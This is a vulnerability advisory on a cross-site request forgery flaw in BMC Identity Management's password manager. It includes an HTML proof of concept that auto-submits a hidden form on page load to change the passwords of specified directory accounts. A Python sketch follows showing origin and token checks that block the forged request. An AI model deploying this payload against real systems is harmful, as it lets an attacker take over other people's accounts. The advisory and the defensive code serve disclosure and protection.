source: https://www.securityfocus.com/bid/53924/info
Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

<html>
<head><title>BMCIDMChangePWCSRFPoC</title></head>
<body onload="document.getElementById('CSRF').submit()">
<form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do" method="post" id="CSRF">
<input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000"/>
<input type="hidden" name="password" value="Abc123!"/>
<input type="hidden" name="passwordAgain" value="Abc123!"/>
<input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000"/>
</form>
</body>
</html>
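
The PoC form above carries no per-session token, so the server has nothing to distinguish it from a form it served itself. A sketch of the server-side check that rejects such a request follows, as an added example (not code from the advisory or the vendor); the origin, the csrf_token field name, the key and the function names are assumptions, and the sample requests are constructed.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SERVER_KEY = b"constructed-demo-key-not-for-production"  # assumption: per-deployment secret
TRUSTED_ORIGIN = "https://idm.example.test"  # assumption: the application's own origin


def issue_token(session_id: str) -> str:
    """Per-session token the server embeds as a hidden field in its own form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_ok(headers: dict) -> bool:
    """True only when Origin (or Referer as fallback) is the application itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed on state-changing requests
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_password_change(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for the POST handler: same-origin request carrying this session's token."""
    supplied = form.get("csrf_token", "")
    expected = issue_token(session_id)
    token_ok = hmac.compare_digest(supplied.encode(), expected.encode())
    return origin_ok(headers) and token_ok


# Constructed requests. FORGED has the same field set as the PoC form (no token).
SESSION = "constructed-session-id-1"
FORGED = ({"Origin": "https://attacker.example.test"},
          {"colChkbx_Tab1": "...", "password": "x", "passwordAgain": "x", "selAccts": "..."})
LEGIT = ({"Origin": TRUSTED_ORIGIN},
         {"password": "x", "passwordAgain": "x", "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    print("forged:", allow_password_change(SESSION, *FORGED))
    print("legit: ", allow_password_change(SESSION, *LEGIT))
```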